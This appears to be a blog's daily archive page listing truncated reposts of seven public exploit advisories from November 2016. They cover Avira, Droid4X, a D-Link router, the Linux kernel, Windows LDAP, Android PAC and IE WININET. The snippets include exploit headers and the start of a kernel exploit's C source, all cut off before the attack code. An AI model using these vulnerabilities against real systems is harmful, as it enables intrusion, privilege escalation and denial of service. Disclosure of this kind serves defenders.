Daily Archives: November 13, 2016

Avira Antivirus 15.0.21.86 – ‘.zip’ Directory Traversal / Command Execution Exploit

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credit: R-73eN

# Title :  Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)

# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 – Reported to Vendor through Bugcrowd.
# 2016-06-29 – Vendor Replied.
# 2016-07-05 – Vendor Replicated the vulnerability.
# 2016-09-02 – Vendor released updated […]

By |November 13th, 2016|Exploits|

Droid4X Privilege Escalation Vulnerability

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: CT-Zer0 Team
# Exploit Title: Droid4X Unquoted Service Path Privilege Escalation

# Category: local
# Vendor Homepage: http://www.droid4x.com/
# Software Link: http://dl.haima.me/download/DXDown/win/Z001/Droid4XInstaller.exe
# Tested on: Windows 7 x86/x64

1. Description

Droid4XService (Droid4XService.exe) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged […]

By |November 13th, 2016|Exploits|

DLink ADSL Router DSL-2750E SEA_1.07 Remote File Disclosure Vulnerability

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Todor Donev
#!/bin/sh
#
#  D-Link ADSL ROUTER DSL-2750E SEA_1.07
#  Remote File Disclosure
#
#  Modem Name:               DSL-2750E
#  Firmware Version:         SEA_1.07

#
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor […]

By |November 13th, 2016|Exploits|

Linux Kernel – TCP Related Read Use-After-Free Exploit

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Marco Grassi

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>
 
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
 
long r;
 
 
int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();
 
        if […]

By |November 13th, 2016|Exploits|

Microsoft Windows Server 2008 / 2012 – LDAP RootDSE Netlogon Denial Of Service (PoC)

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credit: Todor Donev
#!/usr/bin/perl
#
#  MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon
#  (CLDAP “AD Ping”) query reflection DoS PoC
#

#
#  MS Windows Server 2016      
#
#  Description:
#  The attacker  sends a simple query to a vulnerable reflector
#  supporting the Connectionless LDAP […]

By |November 13th, 2016|Exploits|

Android Proxy Auto Config (PAC) Crash Vulnerability

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Yakov Shafranovich
Summary

Android devices can be crashed forcing a halt and then a soft reboot
by downloading a large proxy auto config (PAC) file when adjusting the
Android networking settings. This can also be exploited by an MITM
attacker that can intercept and replace the PAC file. However, the […]

By |November 13th, 2016|Exploits|

Microsoft Internet Explorer WININET.dll

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: SkyLined
Synopsis
 
A specially crafted HTTP response can cause the CHttp­Header­Parser::Parse­Status­Line method in WININET to read data beyond the end of a buffer. The size of the read can be controlled through the HTTP response. An attacker that is able to get any application that uses WININET […]

By |November 13th, 2016|Exploits|